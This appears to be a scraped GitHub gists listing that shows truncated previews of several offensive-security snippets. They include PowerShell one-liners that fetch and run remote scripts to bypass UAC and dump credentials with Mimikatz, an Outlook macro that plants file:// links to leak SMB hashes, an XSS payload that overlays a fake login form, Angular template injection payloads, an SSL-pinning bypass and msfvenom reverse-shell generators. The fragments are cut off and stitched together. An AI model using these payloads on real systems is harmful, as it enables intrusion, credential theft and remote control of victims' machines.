
@lolici123
lolici123 / JavascriptRecon.md
Created February 13, 2023 14:19
My Javascript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty programs.

Steps

  • The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulns)
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
Sub HTMLMessage()
Dim objOutlookMsg As Outlook.MailItem
Dim message, title, defaultValue As String
Dim myValue As String
' prompt for user input.
message = "Enter SMB Tag(s)"
' Set popup box title.
title = "SMB Input Box"
defaultValue = "<img src='file://IPADDRESS/image/signature.jpg'><img src='file:\\IPADDRESS\image\signature.jpg'>"
' Prompt input box
@lolici123
lolici123 / creds.js
Created October 29, 2022 02:13 — forked from sdcampbell/creds.js
XSS payload
var html = `
<div id="bg" style="position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0">
</div>
<div id="form" style="position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px">
<p>An error occurred. Please login again.</p>
<form method="GET" action="https://127.0.0.1:443/">
<p>Username <input type="text" name="username"></p>
<p>Password <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>
</form>
@lolici123
lolici123 / frida_multiple_unpinning.js
Created October 24, 2022 19:27 — forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function() {
console.log('');
@lolici123
lolici123 / A Readme for Adding Certs.md
Created January 21, 2021 20:09 — forked from Artistan/A Readme for Adding Certs.md
Add new certificate (cert) from local/internal intranet to your mac

Add a cert to your MacBook

USAGE

~/add_cert.sh my.intra.net

You will be asked for your password to add this to the keychain.

  • downloads pem file
  • adds to trusted root certificates
@lolici123
lolici123 / AngularTI.md
Created January 10, 2021 15:53 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@lolici123
lolici123 / revip.py
Created April 24, 2019 06:48 — forked from ayoubfathi/revip.py
Using YouGetSignal API to get domains hosted on the same IP - Reverse IP
import requests
import json
import sys
import argparse
_strip = ['http://', 'https://', 'www']
G = '\033[92m'
Y = '\033[93m'
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf #Create ELF file
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe #Create .exe file
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho #Create Mach-O file
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #Reverse PHP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp #Reverse ASP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp #Reverse JSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war #Reverse WAR Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your P